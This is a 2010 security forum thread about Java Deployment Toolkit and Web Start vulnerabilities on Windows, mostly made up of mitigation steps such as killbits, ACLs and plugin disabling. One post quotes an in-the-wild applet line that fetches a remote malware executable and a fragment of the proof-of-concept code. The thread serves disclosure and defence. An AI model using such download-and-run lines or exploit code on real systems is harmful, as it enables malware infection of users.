Serious New Java Flaw Affects All Current Versions of Windows

Discussion in 'other security issues & news' started by mvario, Apr 9, 2010.

Thread Status:
Not open for further replies.
  1. mvario

    mvario Registered Member

    Joined:
    Sep 16, 2008
    Posts:
    339
    Location:
    Haddonfield, IL
    http://seclists.org/fulldisclosure/2010/Apr/119
    Code:
    -------------------
    Mitigation
    -----------------------
    
    If you believe your users may be affected, you should consider applying one of
    the workarounds described below as a matter of urgency.
    
    - Internet Explorer users can be protected by temporarily setting the killbit
      on CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. To the best of my knowledge, the
      deployment toolkit is not in widespread usage and is unlikely to impact end
      users.
    
    - Mozilla Firefox and other NPAPI based browser users can be protected using
      File System ACLs to prevent access to npdeploytk.dll. These ACLs can also be
      managed via GPO.
    
    Detailed documentation on killbits is provided by Microsoft here
    
    [URL="http://support.microsoft.com/kb/240797"]http://support.microsoft.com/kb/240797[/URL]
    
    Domain administrators can deploy killbits and File System ACLs using GPOs, for
    more information on Group Policy, see Microsoft's Group Policy site, here
    
    [URL="http://technet.microsoft.com/en-us/windowsserver/bb310732.aspx"]http://technet.microsoft.com/en-us/windowsserver/bb310732.aspx[/URL]
    
    You may be tempted to kill the HKLM\...\JNLPFile\Shell\Open\Command key, but
    the author does not believe this is sufficient, as the plugin also provides
    enough functionality to install and downgrade JRE installations without
    prompting (seriously). However, if none of your affected users are local
    Administrators, this solution may work (untested).
    
    As always, if you do not require this feature, consider permanently disabling
    it in order to reduce attack surface.
     
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    OK, I see that I have to enable Java in Opera's Preferences. I can get Java to work on test site, such as

    http://www.java.com/en/download/help/testvm.xml

    but the PoC for this vulnerability doesn't seem to work on Opera, as I showed above.


    ----
    rich
     
  3. arran

    arran Registered Member

    Joined:
    Feb 5, 2008
    Posts:
    1,156
    Just simply disable Java in your browser.
     
  4. linuxforall

    linuxforall Registered Member

    Joined:
    Feb 6, 2010
    Posts:
    2,137

    Good then us Opera users are safe. I keep Java disabled till I need it.
     
  5. Skywolfe

    Skywolfe Registered Member

    Joined:
    Apr 8, 2010
    Posts:
    82

    now what are file system ACLs? group poilcy editing isn't even an enabled feature in what I have.
    gpsvc is as a service but you can't access it other than that. now on firefox the toolkit is the NPAPI
    which can be disabled in the browser itself. see previous screenshot.

    and by setting the killbit to what? that is a registry key....not a setting
     
  6. hierophant

    hierophant Registered Member

    Joined:
    Dec 18, 2009
    Posts:
    854
    The two vulnerabilities are ...

    Tavis Ormandy: Java Deployment Toolkit Performs Insufficient Validation of Parameters

    ... and ...

    Ruben Santamarta: [0DAY] JAVA Web Start Arbitrary command-line injection - "-XXaltjvm" arbitrary dll loading


    At the risk of being tedious, here's how I've dealt with these vulnerabilities in my Win XP box. Although it'd be simplest to nuke Java entirely, I'm loathe to go that far, because I occasionally want to run JAR apps. Perhaps I ought to relegate Java to play VMs.

    Anyway, regarding the Java Deployment Toolkit vulnerability, I followed Tavis Ormandy's guidance to set the killbit on the Deployment Toolkit CLSID in the registry (for IE) and deny access to npdeploytk.dll (for Firefox). After doing that, Tavis Ormandy's "harmless demonstration" (link to testcase.html prudently omitted) doesn't succeed. Regarding the Web Start vulnerability, I disabled all Java extensions and plugins in Firefox and xB Browser. I'm not aware of a test for that one. After doing all that, Java still works according to the Oracle test link that Rmus posted.

    Before trying Tavis Ormandy's "harmless demonstration", I verified that it's actually harmless. While blocked with NoScript in XB Browser, I checked out the testcase.html source, and saw that it uses calc.jar as its payload. After downloading calc.jar, I scanned it with Symantec Endpoint Protection v11.0, Prevx v3.0, Windows Defender v1.1, and online Kaspersky and avast! scanners, and found no problems. I then opened it in Winrar, and saw that it merely runs the Windows calculator (calc.exe).

    I then loaded testcase.html in xB Browser, and allowed the site. All I got was the warning "Additional plugins are required to display all the media on this page. [Install Missing Plugins...]". Just to be safe, I disabled Java Quick Starter. FWIW, I don't recall whether that came with XB Browser, or I installed it.

    With IE v7.0, loading testcase.html started Java and, shortly thereafter, Windows calculator. Owned, just like that. No warning, and no way to stop it.

    And so I set the killbit on the Deployment Toolkit CLSID in the registry. That is, I opened regedit and created "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}". I then created a DWORD Value and named it "Compatibility Flags", and then changed the value data to decimal 1024 (hex 400).

    After doing that, loading testcase.html in IE v7.0 did nothing, except for the warning "Done, but with errors on page." at the bottom. Cool.

    I then loaded testcase.html in Firefox v3.6, and got nada. After allowing the site in NoScript, however, I got owned (as expected). And so I denied access to npdeploytk.dll in C:\Program Files\Mozilla Firefox\plugins. That is, I right clicked on npdeploytk.dll, selected Properties|Security, and denied all types of access for all users/groups. BTW, simple file sharing must be off to do that.

    After doing that, loading testcase.html in Firefox v3.6 did nothing, and I got the warning "Additional plugins are required to display all the media on this page. [Install Missing Plugins...]". Just to be safe, I denied all access to copies of npdeploytk.dll in C:\Program Files\Java\jre6\bin and C:\Program Files\Java\jre6\bin\new_plugin.

    Regarding the Web Start vulnerability, I attempted to follow Ruben Santamarta's advice to "Disable javaws/javaws.exe in linux and Windows by any mean." What I did was disable all Java extensions and plugins in Firefox -- the extensions Java Quick Starter, and eight versions of Java Console (6.0.07, 6.0.10, 6.0.11, 6.0.13, 6.0.14, 6.0.15, 6.0.17 and 6.0.1:cool: -- and the plugins Java Development Toolkit v6.0 and Java Platform SE 6 U18. I wonder why there are so many versions of Java Console. Anyone o_O

    I'm unclear what else to do. I find multiple copies of several files of the form javaws*.*: javaws.exe (7), javaws.jar (4), javaws.pack (2), javaws.policy (7), javaws-l10n.jar (2) and javawspl.dll (2). I suppose that I could deny access to all of them and see what happens. Anyone o_O

    Anyway, I trust that was helpful to someone here. Comments o_O
     
  7. Skywolfe

    Skywolfe Registered Member

    Joined:
    Apr 8, 2010
    Posts:
    82
    ok all that test link did that I saw was open the windows calculator which is an exe file through firefox. the link itself said to install missing plugins on that page but it opened up the calculator utility lol. what I was asking mainly with the Javaws file is how do you actually DISABLE it? since it is a browser specific issue and nothing to do with the operating system in general, then it seems to me 64 bit versions of IE would be fine because in order to have Java run on 64 bit the 64 bit app needs to be downloaded just like the 32 bit one does. but maybe that is just me. right now, I have noscript running in firefox which is my primary browser anyway and it disables script execution period from Java or otherwise. the reason there are that many versions of the Java console I am not real sure. I experienced that problem a while back when I upgraded to a newer version of firefox. I had multiple console entries in the addons area. which isn't a big deal just remove everything but the latest and it doesn't show up.
     
  8. hierophant

    hierophant Registered Member

    Joined:
    Dec 18, 2009
    Posts:
    854
    If it can open calculator, it can run anything, and it can get that anything from anywhere. That's not good.

    Right, Ruben Santamarta didn't say how to disable javaws. I disabled the browser plugins that use javaws. Perhaps he meant more. I don't know.

    That's fine, until you decide to let a site run. Then the fun may begin :gack:

    Thanks. It just struck me as sloppy to leave them all.
     
  9. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    That sounds plausible, but the PoC didn't have code to exploit Opera, so we can't really test. I emailed the author of the Proof of Concept (PoC) and asked why he didn't include Opera. (See my first post with a sample of the code) It may be that Opera cannot be exploited, and I hope he will answer with an explanation.

    Meanwhile, I became curious about the PoC, and since I can't get it to run in my trusty unpatched IE6 on my desktop system with an old version of Java, I fired up my laptop which has IE8 and the recent Java version 6. Sure enough, the calculator launched!

    There were six files created in the user profile directory.

    Then I renamed Javaws.exe in the Java directory, and the exploit failed, so that workaround described in one of the articles is effective.

    EDIT: In the IE preferences, if I disable Java, the exploit does not work.

    ___________________________________________________________________________________________​

    I've never gotten a real JAVA exploit in the wild to work on my desktop system with IE6, but I've seen a few exploits and they all attempt to launch a trojan executable. Here is one from 2006. The .jar file is cached:

    traffd_jar.gif

    and the code for the malware:

    Code:
    applet archive="java.jar"
    value="http://traffweb.biz/dl/loaderadv799.exe
    
    Here are two others that were written up:

    JAVA Exploit Kit Malware #1
    January, 2010
    http://www.inreverse.net/?p=804
    Fake AV c/o PDF and Java exploits
    February, 2010
    http://www.sophos.com/blogs/sophoslabs/v/post/8622
    Another of the work-arounds for the current vulnerability is to set a kill-bit for the Class ID# CAFEEFAC......

    This prevents the code from creating the java object, as shown in the code:

    Code:
     if (window.navigator.appName == "Microsoft Internet Explorer") {
                [B]var o [/B]= document.createElement("OBJECT");
    
                [B]o.classid[/B] = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
    
    This is nothing new, and has been recommended for previous Java exploits, as here:

    Java JRE deploytk.dll ActiveX Control Multiple BOF Vulnerabilities
    May, 2009
    http://www.securityspace.com/smysecure/catid.html?id=900354

    CLass IDs are used in the Registry to identify particular applications installed on the computer. The are used by cybercriminals call a particular application in their exploit. See here for details:

    CLSID (Class ID)
    http://www.fileresearchcenter.com/showglossaryterm.html?term=CLSID

    Microsoft explains that the "killbit" disables the Class Identifying number for a particular application:

    http://support.microsoft.com/kb/240797

    Now, PoCs cannot really test most security products for these types of exploits in the wild, since PoCs use trusted executables, naturally. And surely, we can eliminate the possibility that a cybercriminal using this code in an exploit package would launch the calculator executable! Also, if the exploit happened to get in the wild before anyone knew about it, we wouldn't have any suggested workarounds, and you would be at the mercy of having a malware executable automatically installed, unless you had other protection in place. Note in the Sophos analysis above that their product identified/blocked the .jar file in that exploit asTroj/Java-B.

    So, for a better test I modified the PoC to launch an executable not white listed on my computer, and the exploit was easily blocked.

    javatest.gif

    In essence, this exploit is just another possible way to trigger the download of malware, and will probably be used for this purpose by cybercriminals. While applying bandaids (workarounds, patches, updates) is effective, they are reactive in that they aren't known until the vulnerability is discovered, creating the so-called 0-day scenario.

    Proactive protection against malware intrusion will prevent these types of exploits from succeeding no matter what application is used as the triggering device.

    Get the word out!

    ----
    rich
     
    Last edited: Apr 12, 2010
  10. Skywolfe

    Skywolfe Registered Member

    Joined:
    Apr 8, 2010
    Posts:
    82
    the only problem I found with noscript is it blocks almostevery site from going through so basicaly if you want access to something even if you click allow on that site, it still blocks it from going through. as far as Java is concerned.,.. alot of places use it. but if you disable the control which allows it to run.. it won't see it as being installed in the first place.
     
  11. mvario

    mvario Registered Member

    Joined:
    Sep 16, 2008
    Posts:
    339
    Location:
    Haddonfield, IL
    You could also do it with Local Security Settings (secpol.msc)
    Security Settings > Software Restriction Policy > Additional Rules and create a New Path Rule to disallow.

    or with Group Policy (gpedit.msc)
    Local Computer Policy > Conmputer Configuration > Windows Settings > Security Settings > Additional Rules and create a New Path Rule to disallow.

    If you do it the way you did with file security properties then it might be best to disallow only Read & Execute. Otherwise remember to change permissions before you update or when the fix arrives the files won't be able to be replaced with new ones.
     
  12. hierophant

    hierophant Registered Member

    Joined:
    Dec 18, 2009
    Posts:
    854
    Thanks. Good points.
     
  13. herb_tea

    herb_tea Registered Member

    Joined:
    Jun 3, 2008
    Posts:
    5
    Location:
    NJ
    @hierophant

    Thanks for the details, helped greatly in securing my machine :)
     
  14. linuxforall

    linuxforall Registered Member

    Joined:
    Feb 6, 2010
    Posts:
    2,137
  15. nanana1

    nanana1 Frequent Poster

    Joined:
    Jun 22, 2007
    Posts:
    947
    Anyone knows if Java will release a new update so soon after their recent quarterly update 19 release to patch these security holes o_O
     
  16. linuxforall

    linuxforall Registered Member

    Joined:
    Feb 6, 2010
    Posts:
    2,137
    There is talk on Java forum so I am sure an update is on its way.
     
  17. nanana1

    nanana1 Frequent Poster

    Joined:
    Jun 22, 2007
    Posts:
    947
    Wow....then I do expect Java 6 update 19a soon ! :p
     
  18. mvario

    mvario Registered Member

    Joined:
    Sep 16, 2008
    Posts:
    339
    Location:
    Haddonfield, IL
    Last edited: Apr 14, 2010
  19. xxJackxx

    xxJackxx Registered Member

    Joined:
    Oct 23, 2008
    Posts:
    8,625
    Location:
    USA
    I removed Java from my laptop last week to see if I would miss it. So far... no.
     
  20. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    From mvario's link :thumb:

    http://krebsonsecurity.com/2010/04/unpatched-java-exploit-spotted-in-the-wild

    sp.gif

    spy.gif

    v.gif

    It's an unusally large size 7.08 MB ! Probably badly coded ? Is it v1.00.0000 or v15.0.0.573 :D Copyright (C) 2008 Acresso Software Inc. So sue me :p

    Who'ld want to be an AV vendor trying to keep up with all these rogues :(

    If you know anyone who visits songlyrics.com give them a heads up ;)
     
  21. Skywolfe

    Skywolfe Registered Member

    Joined:
    Apr 8, 2010
    Posts:
    82
    if the java code is already being exploited out there as threatpost said it has been earlier, then Oracle won't have a choice but to actually do something about it. and as far as I am concerned the sooner it gets taken care of the better.
     
    Last edited: Apr 15, 2010
  22. Ocky

    Ocky Registered Member

    Joined:
    May 6, 2006
    Posts:
    2,713
    Location:
    George, S.Africa
  23. nanana1

    nanana1 Frequent Poster

    Joined:
    Jun 22, 2007
    Posts:
    947
  24. arleetel

    arleetel Registered Member

    Joined:
    Apr 28, 2006
    Posts:
    14
    Does the update fix the vulnerability ?
    Thanks.
     
  25. Cudni

    Cudni Global Moderator

    Joined:
    May 24, 2009
    Posts:
    6,963
    Location:
    Somethingshire
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.